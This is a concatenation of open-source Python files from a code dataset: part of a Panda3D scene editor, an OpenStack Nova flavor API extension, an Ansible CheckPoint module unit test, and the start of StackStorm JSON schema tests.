print "SCENE EDITOR::" + thedir
self.CurrentDirName=thedir
if self.CurrentFileName != None:
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
if self.lightingPanel !=None:
lightList=AllScene.getList()
self.lightingPanel.updateList(lightList)
messenger.send('SGE_Update Explorer',[render])
# Close the side window in order to reset all world settings to fit the scene we have loaded.
self.sideWindow.quit()
# Try to re-open the side window again
while self.sideWindow == None:
wColor = base.getBackgroundColor()
self.worldColor[0] = wColor.getX()
self.worldColor[1] = wColor.getY()
self.worldColor[2] = wColor.getZ()
self.worldColor[3] = wColor.getW()
self.lightEnable = 1
self.ParticleEnable = 1
self.collision = 1
self.openSideWindow()
def saveScene(self):
#################################################################
# saveScene(self)
# If this is an open file call saveAsScene
# or else instantiate FileSaver from seFileSaver.py and pass it the filename
# If this filename exists in sys.modules you cannot use it
#################################################################
if(self.CurrentFileName):
f=FileSaver()
f.SaveFile(AllScene,self.CurrentFileName,self.CurrentDirName,1)
self.Dirty=0
else:
self.saveAsScene()
pass
def saveAsBam(self):
fileName = tkFileDialog.asksaveasfilename(filetypes = [("BAM",".bam")],title = "Save Scenegraph as Bam file")
theScene=render.find("**/Scene")
if not theScene is None:
theScene.writeBamFile(fileName)
else:
render.writeBamFile(fileName+".bad")
print " Scenegraph saved as :" +str(fileName)
def loadFromBam(self):
fileName = tkFileDialog.askopenfilename(filetypes = [("BAM",".bam")],title = "Load Scenegraph from Bam file")
if not fileName is None:
d=path(fileName)
scene=loader.loadModel(d.relpath())
scene.reparentTo(render)
def saveAsScene(self):
#################################################################
# saveAsScene(self)
# Ask for filename using a file save dialog
# If this filename exists in sys.modules you cannot use it
# Instantiate FileSaver from seFileSaver.py and pass it the filename
#################################################################
fileName = tkFileDialog.asksaveasfilename(filetypes = [("PY","py")],title = "Save Scene")
if(not fileName):
return
fCheck=Filename(fileName)
#print fCheck.getBasenameWoExtension()
###############################################################################
# !!!!! See if a module exists by this name... if it does you cannot use this filename !!!!!
###############################################################################
if(sys.modules.has_key(fCheck.getBasenameWoExtension())):
tkMessageBox.showwarning(
"Save file",
"Cannot save with this name because there is a system module with the same name. Please resave as something else."
)
return
self.CurrentDirName=fileName
fileName=fileName+".py"
f=FileSaver()
self.CurrentFileName=fileName
f.SaveFile(AllScene,fileName,self.CurrentDirName,0)
self.Dirty=0
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
pass
def loadModel(self):
#################################################################
# loadModel(self)
# This function will be called when user tries to load a model into the scene.
# Here we will pop-up a dialog to ask user which model file should be loaded in.
# Then, pass the path to dataHolder to load the model in.
#################################################################
modelFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Model',
parent = self.parent)
if modelFilename:
self.makeDirty()
if not AllScene.loadModel(modelFilename, Filename.fromOsSpecific(modelFilename)):
print '----Error! No Such Model File!'
pass
def loadActor(self):
#################################################################
# loadActor(self)
# This function will be called when user tries to load an Actor into the scene.
# Here we will pop-up a dialog to ask user which Actor file should be loaded in.
# Then, pass the path to dataHolder to load the Actor in.
#################################################################
ActorFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Actor',
parent = self.parent)
if ActorFilename:
self.makeDirty()
if not AllScene.loadActor(ActorFilename, Filename.fromOsSpecific(ActorFilename)):
print '----Error! No Such Model File!'
pass
def importScene(self):
self.makeDirty()
print '----God bless you Please Import!'
pass
## Take care those things under Edit nemu
def unDo(self):
pass
def reDo(self):
pass
def deSelectNode(self, nodePath=None):
#################################################################
# deSelectNode(self, nodePath=None)
# This function will deselect the node which we have selected currently.
# This will also remove the monitor task which monitor selected object's
# position, orientation and scale each frame.
#################################################################
if nodePath != None:
self.seSession.deselect(nodePath)
if self.isSelect:
self.isSelect = False
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected =None
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
if self.sideWindowCount==1:
self.sideWindow.SGE.deSelectTree()
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
pass
def addDummy(self):
#################################################################
# addDummy(self)
# This function will do nothing but call other function
# to add a dummy into the scene.
#
# Ok... this is really redundancy...
#
#################################################################
self.addDummyNode(self.nodeSelected)
pass
def duplicateNode(self):
#################################################################
# duplicateNode(self)
# This function will do nothing but call other function
# to open the duplication window.
#
# Ok... this is really redundancy...
#
#################################################################
if self.nodeSelected!=None:
self.duplicate(self.nodeSelected)
pass
def removeNode(self):
#################################################################
# removeNode(self)
# This function will do nothing but call other function
# to remove the current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.remove(self.nodeSelected)
pass
def showObjProp(self):
################################################################
# showObjProp(self)
# This function will do nothing but call other function
# to open the property window of current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(self.nodeSelected)
pass
def showCameraSetting(self):
################################################################
# showCameraSetting(self)
# This function will do nothing but call other function
# to open the property window of camera..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(camera)
pass
def showRenderSetting(self):
'''Currently, no idea what gonna pop-out here...'''
pass
## Take care those thins under Edit nemu
def openSideWindow(self):
################################################################
# openSideWindow(self)
# This function will open the side window and set the reference number
# so that we can make sure there won't have two or more side windows in the same time.
################################################################
if self.sideWindowCount==0:
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.menuPanel.entryconfig('Side Window', state=DISABLED)
return
def openAnimationPanel(self):
################################################################
# openAnimationPanel(self)
# This function will do nothing but call other function
# to open the animation window for selected node(if it is an Actor)..
#
# Ok... this is really redundancy...
#
################################################################
if AllScene.isActor(self.nodeSelected):
self.openAnimPanel(self.nodeSelected)
pass
def openMopathPanel(self):
################################################################
# openMopathPanel(self)
# This function will create a Motion Path Recorder
################################################################
MopathPanel = MopathRecorder()
pass
def toggleParticleVisable(self, visable):
################################################################
# toggleParticleVisable(self, visable)
# This function will be called each time user has toggled
# the check box of Particle visibility in the side window.
# The reason we keep track this is because
# we have to know we should show/hide the model on the new-created particle
################################################################
self.ParticleEnable = visable
AllScene.toggleParticleVisable(visable)
return
def openLightingPanel(self):
################################################################
# openLightingPanel(self)
# open the lighting panel here.
# If there is already exist a lighting panel, then do nothing
################################################################
if self.lightingPanel==None:
self.lightingPanel = lightingPanel(AllScene.getLightList())
self.menuPanel.entryconfig('Lighting Panel', state=DISABLED)
return
def addParticleEffect(self,effect_name,effect,node):
AllScene.particleDict[effect_name]=effect
AllScene.particleNodes[effect_name]=node
if not self.ParticleEnable:
AllScene.particleNodes[effect_name].setTransparency(True)
AllScene.particleNodes[effect_name].setAlphaScale(0)
AllScene.particleNodes[effect_name].setBin("fixed",1)
return
def openParticlePanel(self):
if self.particlePanel != None:
## There already has a Particle panel!
return
if(len(AllScene.particleDict)==0):
self.particlePanel=seParticlePanel.ParticlePanel()
else:
for effect in AllScene.particleDict:
theeffect=AllScene.particleDict[effect]
self.particlePanel=seParticlePanel.ParticlePanel(particleEffect=theeffect,effectsDict=AllScene.particleDict)
pass
def closeParticlePanel(self):
self.particlePanel = None
return
def openInputPanel(self):
if self.controllerPanel==None:
list = AllScene.getAllObjNameAsList()
type, dataList = AllScene.getControlSetting()
self.controllerPanel = controllerWindow(listOfObj = list, controlType = type, dataList = dataList)
pass
def closeInputPanel(self):
self.controllerPanel = None
return
def requestObjFromControlW(self, name):
################################################################
# requestObjFromControlW(self, name)
# Call back function
# Each time when user selects a node from Control Panel,
# this function will be called.
# This function will get the actual nodePath from dataHolder and then
# set it back into controller panel
################################################################
node = AllScene.getObjFromSceneByName(name)
if (self.controllerPanel) != None and (node!=None):
self.controllerPanel.setNodePathIn(node)
return
def setControlSet(self, controlType, dataList):
if controlType == 'Keyboard':
self.controlTarget = dataList[0]
self.keyboardMapDict.clear()
self.keyboardMapDict = dataList[1].copy()
self.keyboardSpeedDict.clear()
self.keyboardSpeedDict = dataList[2].copy()
return
def startControl(self, controlType, dataList):
if not self.enableControl:
self.enableControl = True
else:
# Stop the current control setting first
# Also this will make sure we won't catch wrong keyboard message
self.stopControl(controlType)
self.enableControl = True
self.setControlSet(controlType, dataList)
self.lastContorlTimer = globalClock.getFrameTime()
if controlType == 'Keyboard':
self.controlType = 'Keyboard'
self.keyControlEventDict = {}
self.transNodeKeyboard = self.controlTarget.attachNewNode('transformNode')
self.transNodeKeyboard.hide()
for index in self.keyboardMapDict:
self.keyControlEventDict[index] = 0
self.accept(self.keyboardMapDict[index], lambda a = index:self.keyboardPushed(a))
self.accept(self.keyboardMapDict[index]+'-up', lambda a = index:self.keyboardReleased(a))
return
def stopControl(self, controlType):
if not self.enableControl:
return
if controlType == 'Keyboard':
self.enableControl = False
for index in self.keyboardMapDict:
self.ignore(self.keyboardMapDict[index])
self.ignore(self.keyboardMapDict[index]+'-up')
taskMgr.remove("KeyboardControlTask")
self.transNodeKeyboard.removeNode()
return
def keyboardPushed(self, key):
self.keyControlEventDict[key] = 1
if not taskMgr.hasTaskNamed("KeyboardControlTask"):
self.keyboardLastTimer = globalClock.getFrameTime()
taskMgr.add(self.keyboardControlTask, "KeyboardControlTask")
return
def keyboardReleased(self, key):
self.keyControlEventDict[key] = 0
for index in self.keyControlEventDict:
if self.keyControlEventDict[index] == 1:
return
if taskMgr.hasTaskNamed("KeyboardControlTask"):
taskMgr.remove("KeyboardControlTask")
return
def keyboardControlTask(self, task):
newTimer = globalClock.getFrameTime()
delta = newTimer - self.keyboardLastTimer
self.keyboardLastTimer = newTimer
pos = self.controlTarget.getPos()
hpr = self.controlTarget.getHpr()
scale = self.controlTarget.getScale()
self.transNodeKeyboard.setPosHpr((self.keyControlEventDict['KeyRight']*self.keyboardSpeedDict['SpeedRight']-self.keyControlEventDict['KeyLeft']*self.keyboardSpeedDict['SpeedLeft'])*delta,
(self.keyControlEventDict['KeyForward']*self.keyboardSpeedDict['SpeedForward']-self.keyControlEventDict['KeyBackward']*self.keyboardSpeedDict['SpeedBackward'])*delta,
(self.keyControlEventDict['KeyUp']*self.keyboardSpeedDict['SpeedUp']-self.keyControlEventDict['KeyDown']*self.keyboardSpeedDict['SpeedDown'])*delta,
(self.keyControlEventDict['KeyTurnLeft']*self.keyboardSpeedDict['SpeedTurnLeft']-self.keyControlEventDict['KeyTurnRight']*self.keyboardSpeedDict['SpeedTurnRight'])*delta,
(self.keyControlEventDict['KeyTurnUp']*self.keyboardSpeedDict['SpeedTurnUp']-self.keyControlEventDict['KeyTurnDown']*self.keyboardSpeedDict['SpeedTurnDown'])*delta,
(self.keyControlEventDict['KeyRollLeft']*self.keyboardSpeedDict['SpeedRollLeft']-self.keyControlEventDict['KeyRollRight']*self.keyboardSpeedDict['SpeedRollRight'])*delta)
newPos = self.transNodeKeyboard.getPos(self.controlTarget.getParent())
newHpr = self.transNodeKeyboard.getHpr(self.controlTarget.getParent())
overAllScale = self.keyControlEventDict['KeyScaleUp']*self.keyboardSpeedDict['SpeedScaleUp']-self.keyControlEventDict['KeyScaleDown']*self.keyboardSpeedDict['SpeedScaleDown']
newScale = Point3(scale.getX() + (overAllScale + self.keyControlEventDict['KeyScaleXUp']*self.keyboardSpeedDict['SpeedScaleXUp'] - self.keyControlEventDict['KeyScaleXDown']*self.keyboardSpeedDict['SpeedScaleXDown'])*delta,
scale.getY() + (overAllScale + self.keyControlEventDict['KeyScaleYUp']*self.keyboardSpeedDict['SpeedScaleYUp'] - self.keyControlEventDict['KeyScaleYDown']*self.keyboardSpeedDict['SpeedScaleYDown'])*delta,
scale.getZ() + (overAllScale + self.keyControlEventDict['KeyScaleZUp']*self.keyboardSpeedDict['SpeedScaleZUp'] - self.keyControlEventDict['KeyScaleZDown']*self.keyboardSpeedDict['SpeedScaleZDown'])*delta
)
self.controlTarget.setPos(newPos.getX(), newPos.getY() , newPos.getZ())
self.controlTarget.setHpr(newHpr.getX(), newHpr.getY() , newHpr.getZ())
self.controlTarget.setScale(newScale.getX(),newScale.getY(),newScale.getZ())
self.transNodeKeyboard.setPosHpr(0,0,0,0,0,0)
return Task.cont
## Misc
##### This one get the event from SGE (Scene Graph Explorer) and Picking
def selectNode(self, nodePath=None, callBack = True):
################################################################
# selectNode(self, nodePath=None, callBack = True)
# This will be called when user try to select nodes from the
# side window.
# It will also call seSession to select this node in order to keep data's consistency
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
if callBack:
self.seSession.select(nodePath,fResetAncestry=1)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def selectFromScene(self, nodePath=None, callBack=True):
################################################################
# selectFromScene(self, nodePath=None, callBack = True)
# This will be called when user try to select nodes from the
# scene. (By picking)
# Actually this will be called by seSession
# The reason we make two selections is we don't want they call each other and never stop...
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
self.sideWindow.SGE.selectNodePath(nodePath,callBack)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def monitorSelectedNodeTask(self, task):
################################################################
# monitorSelectedNodeTask(self, task)
# This is a function which will keep tracking
# the position, orientation and scale data of selected node and update the display on the screen.
# Alos, it will send out message to sychronize the data in the placer and property window.
################################################################
if self.nodeSelected != None:
pos = self.nodeSelected.getPos()
hpr = self.nodeSelected.getHpr()
scale = self.nodeSelected.getScale()
if ((self.oPos != pos )or(self.oScale != scale)or(self.oHpr != hpr)):
messenger.send('forPorpertyWindow'+self.nodeSelected.getName(),[pos, hpr, scale])
messenger.send('placerUpdate')
self.oPos = pos
self.oScale = scale
self.oHpr = hpr
self.posLabel['text'] = "Position : X: %2.2f Y: %2.2f Z: %2.2f"%(pos.getX(), pos.getY(),pos.getZ())
self.hprLabel['text'] = "Orientation: H: %2.2f P: %2.2f R: %2.2f"%(hpr.getX(), hpr.getY(),hpr.getZ())
self.scaleLabel['text'] = "Scale : X: %2.2f Y: %2.2f Z: %2.2f"%(scale.getX(), scale.getY(),scale.getZ())
return Task.cont
def deselectFromScene(self):
################################################################
# deselectFromScene(self)
# This function will do nothing but call other function
# to delete selected node...
#
# Ok... this is really redundancy...
#
################################################################
self.deSelectNode(self.nodeSelected)
messenger.send('SGE_Update Explorer',[render])
##### Take care the even quest from Side Window
def lightToggle(self):
################################################################
# lightToggle(self)
# This function will do nothing but call other function
# to toggle the light...
################################################################
self.makeDirty()
AllScene.toggleLight()
return
def sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
################################################################
# sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
# backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
# This function will be called when user close the side window.
# Here we will restore all parameters about world setting back in the sceneEditor.
# So, when next time people recall the side window, it will still keep the same world setting.
################################################################
if self.sideWindowCount==1:
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
self.sideWindowCount=0
self.sideWindow = None
self.menuPanel.entryconfig('Side Window', state=NORMAL)
return
## Process message from Duplication Window
def duplicationObj(self, nodePath, pos, hpr, scale, num):
################################################################
# duplicationObj(self, nodePath, pos, hpr, scale, num)
# This function will do nothing but call other function
# to duplicate selected node...
#
# Ok... this is really redundancy...
#
################################################################
AllScene.duplicateObj(nodePath, pos, hpr, scale, num)
return
## Process message from Animation Panel
def animationLoader(self, nodePath, Dic):
name = nodePath.getName()
AllScene.loadAnimation(name, Dic)
return
def animationRemove(self, nodePath, name):
AllScene.removeAnimation(nodePath.getName(),name)
return
def animPanelClose(self, name):
if self.animPanel.has_key(name):
del self.animPanel[name]
return
### Blend Animation Panel
def openBlendAnimPanel(self, nodePath=None):
################################################################
# openBlendAnimPanel(self, nodePath=None)
# This function will get the user defined blending animation data from dataHolder.
# And then open a blendAnimPanel by passing those data in.
################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animBlendPanel.has_key(name):
print '---- You already have an Blend Animation Panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
Dict = AllScene.getBlendAnimAsDict(name)
self.animBlendPanel[name] = BlendAnimPanel(aNode=Actor, blendDict=Dict)
pass
return
def animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect):
################################################################
# animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect)
# This function will call dataHolder to save the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.saveBlendAnim(actorName, blendName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelRemove(self, actorName, blendName):
################################################################
# animBlendPanelRemove(self, actorName, blendName)
# This function will call dataHolder to remove the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.removeBlendAnim(actorName, blendName)
self.animBlendPanel[actorName].setBlendAnimList(dict, True)
return
def animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect):
################################################################
# animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect)
# This function will call dataHolder to rename the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.renameBlendAnim(actorName, nName, oName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelClose(self, name):
################################################################
# animBlendPanelClose(self, name)
# This function will be called when Blend panel has been closed.
# Here we will reset the reference dictionary so it can be open again.
################################################################
if self.animBlendPanel.has_key(name):
del self.animBlendPanel[name]
return
## Process message from SEditor object
def toggleWidgetVis(self):
################################################################
# toggleWidgetVis(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWidgetVisFromMainW()
else:
self.widgetVis = (self.widgetVis+1)%2
def toggleBackface(self):
################################################################
# toggleBackface(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleBackfaceFromMainW()
else:
self.backface = (self.backface+1)%2
def toggleTexture(self):
################################################################
# toggleTexture(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleTextureFromMainW()
else:
self.texture = (self.texture+1)%2
def toggleWireframe(self):
################################################################
# toggleWireframe(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWireframeFromMainW()
else:
self.wireframe = (self.wireframe+1)%2
def openAlignPanel(self, nodePath=None):
name = nodePath.getName()
if not self.alignPanelDict.has_key(name):
list = AllScene.getAllObjNameAsList()
if name in list:
list.remove(name)
else:
return
self.alignPanelDict[name] = AlignTool(nodePath = nodePath, list = list)
return
def closeAlignPanel(self, name=None):
if self.alignPanelDict.has_key(name):
del self.alignPanelDict[name]
def alignObject(self, nodePath, name, list):
target = AllScene.getObjFromSceneByName(name)
pos = target.getPos()
hpr = target.getHpr()
scale = target.getScale()
if list[0]: # Align X
nodePath.setX(pos.getX())
if list[1]: # Align Y
nodePath.setY(pos.getY())
if list[2]: # Align Z
nodePath.setZ(pos.getZ())
if list[3]: # Align H
nodePath.setH(hpr.getX())
if list[4]: # Align P
nodePath.setP(hpr.getY())
if list[5]: # Align R
nodePath.setR(hpr.getZ())
if list[6]: # Scale X
nodePath.setSx(scale.getX())
if list[7]: # Scale Y
nodePath.setSy(scale.getY())
if list[8]: # Scale Z
nodePath.setSz(scale.getZ())
return
### Event from Motion Path Panel
def requestCurveList(self, nodePath,name):
curveList = AllScene.getCurveList(nodePath)
messenger.send('curveListFor'+name, [curveList])
## Steal from DirectSession...
def flash(self, nodePath = 'None Given'):
""" Highlight an object by setting it red for a few seconds """
# Clean up any existing task
taskMgr.remove('flashNodePath')
# Spawn new task if appropriate
if nodePath == 'None Given':
# If nothing specified, try selected node path
nodePath = self.selected.last
if nodePath:
if nodePath.hasColor():
doneColor = nodePath.getColor()
flashColor = VBase4(1) - doneColor
flashColor.setW(1)
else:
doneColor = None
flashColor = VBase4(1,0,0,1)
# Temporarily set node path color
nodePath.setColor(flashColor)
# Clean up color in a few seconds
t = taskMgr.doMethodLater(1.5,
# This is just a dummy task
self.flashDummy,
'flashNodePath')
t.nodePath = nodePath
t.doneColor = doneColor
# This really does all the work
t.uponDeath = self.flashDone
def flashDummy(self, state):
# Real work is done in upon death function
return Task.done
def flashDone(self,state):
# Return node Path to original state
if state.nodePath.isEmpty():
# Node path doesn't exist anymore, bail
return
if state.doneColor:
state.nodePath.setColor(state.doneColor)
else:
state.nodePath.clearColor()
editor = myLevelEditor(parent = base.tkRoot)
run()
| bsd-3-clause |
nikesh-mahalka/nova | nova/api/openstack/compute/flavor_rxtx.py | 33 | 2097 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Flavor Rxtx API extension."""
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
ALIAS = 'os-flavor-rxtx'
authorize = extensions.os_compute_soft_authorizer(ALIAS)
class FlavorRxtxController(wsgi.Controller):
def _extend_flavors(self, req, flavors):
for flavor in flavors:
db_flavor = req.get_db_flavor(flavor['id'])
key = 'rxtx_factor'
flavor[key] = db_flavor['rxtx_factor'] or ""
def _show(self, req, resp_obj):
if not authorize(req.environ['nova.context']):
return
if 'flavor' in resp_obj.obj:
self._extend_flavors(req, [resp_obj.obj['flavor']])
@wsgi.extends
def show(self, req, resp_obj, id):
return self._show(req, resp_obj)
@wsgi.extends(action='create')
def create(self, req, resp_obj, body):
return self._show(req, resp_obj)
@wsgi.extends
def detail(self, req, resp_obj):
if not authorize(req.environ['nova.context']):
return
self._extend_flavors(req, list(resp_obj.obj['flavors']))
class FlavorRxtx(extensions.V21APIExtensionBase):
"""Support to show the rxtx status of a flavor."""
name = "FlavorRxtx"
alias = ALIAS
version = 1
def get_controller_extensions(self):
controller = FlavorRxtxController()
extension = extensions.ControllerExtension(self, 'flavors', controller)
return [extension]
def get_resources(self):
return []
| apache-2.0 |
simonwydooghe/ansible | test/units/modules/network/check_point/test_cp_mgmt_security_zone_facts.py | 19 | 2864 | # Ansible module to manage CheckPoint Firewall (c) 2019
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from units.modules.utils import set_module_args, exit_json, fail_json, AnsibleExitJson
from ansible.module_utils import basic
from ansible.modules.network.check_point import cp_mgmt_security_zone_facts
OBJECT = {
"from": 1,
"to": 1,
"total": 6,
"objects": [
"53de74b7-8f19-4cbe-99fc-a81ef0759bad"
]
}
SHOW_PLURAL_PAYLOAD = {
'limit': 1,
'details_level': 'uid'
}
SHOW_SINGLE_PAYLOAD = {
'name': 'object_which_is_not_exist'
}
api_call_object = 'security-zone'
api_call_object_plural_version = 'security-zones'
failure_msg = '''{u'message': u'Requested object [object_which_is_not_exist] not found', u'code': u'generic_err_object_not_found'}'''
class TestCheckpointSecurityZoneFacts(object):
module = cp_mgmt_security_zone_facts
@pytest.fixture(autouse=True)
def module_mock(self, mocker):
return mocker.patch.multiple(basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json)
@pytest.fixture
def connection_mock(self, mocker):
connection_class_mock = mocker.patch('ansible.module_utils.network.checkpoint.checkpoint.Connection')
return connection_class_mock.return_value
def test_show_single_object_which_is_not_exist(self, mocker, connection_mock):
connection_mock.send_request.return_value = (404, failure_msg)
try:
result = self._run_module(SHOW_SINGLE_PAYLOAD)
except Exception as e:
result = e.args[0]
assert result['failed']
assert 'Checkpoint device returned error 404 with message ' + failure_msg == result['msg']
def test_show_few_objects(self, mocker, connection_mock):
connection_mock.send_request.return_value = (200, OBJECT)
result = self._run_module(SHOW_PLURAL_PAYLOAD)
assert not result['changed']
assert OBJECT == result['ansible_facts'][api_call_object_plural_version]
def _run_module(self, module_args):
set_module_args(module_args)
with pytest.raises(AnsibleExitJson) as ex:
self.module.main()
return ex.value.args[0]
| gpl-3.0 |
pixelrebel/st2 | st2common/tests/unit/test_json_schema.py | 8 | 14816 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest2 import TestCase
from jsonschema.exceptions import ValidationError
from st2common.util import schema as util_schema
TEST_SCHEMA_1 = {
'additionalProperties': False,
'title': 'foo',
'description': 'Foo.',
'type': 'object',
'properties': {
'arg_required_no_default': {
'description': 'Foo',
'required': True,
'type': 'string'
},
'arg_optional_no_type': {
'description': 'Bar'
},
'arg_optional_multi_type': {
'description': 'Mirror mirror',
'type': ['string', 'boolean', 'number']
},
'arg_optional_multi_type_none': {
'description': 'Mirror mirror on the wall',
'type': ['string', 'boolean', 'number', 'null']
},
'arg_optional_type_array': {
'description': 'Who''s the fairest?',
'type': 'array'
},
'arg_optional_type_object': {
'description': 'Who''s the fairest of them?',
'type': 'object'
},
'arg_optional_multi_collection_type': {
'description': 'Who''s the fairest of them all?',
'type': ['array', 'object']
}
}
}
TEST_SCHEMA_2 = {
'additionalProperties': False,
'title': 'foo',
'description': 'Foo.',
'type': 'object',
'properties': {
'arg_required_default': {
'default': 'date',
'description': 'Foo',
'required': True,
'type': 'string'
}
}
}
TEST_SCHEMA_3 = {
'additionalProperties': False,
'title': 'foo',
'description': 'Foo.',
'type': 'object',
'properties': {
'arg_optional_default': {
'default': 'bar',
'description': 'Foo',
'type': 'string'
},
'arg_optional_default_none': {
'default': None,
'description': 'Foo',
'type': 'string'
},
'arg_optional_no_default': {
'description': 'Foo',
'type': 'string'
}
}
}
TEST_SCHEMA_4 = {
'additionalProperties': False,
'title': 'foo',
'description': 'Foo.',
'type': 'object',
'properties': {
'arg_optional_default': {
'default': 'bar',
'description': 'Foo',
'anyOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
'arg_optional_default_none': {
'default': None,
'description': 'Foo',
'anyOf': [
{'type': 'string'},
{'type': 'boolean'}
]
},
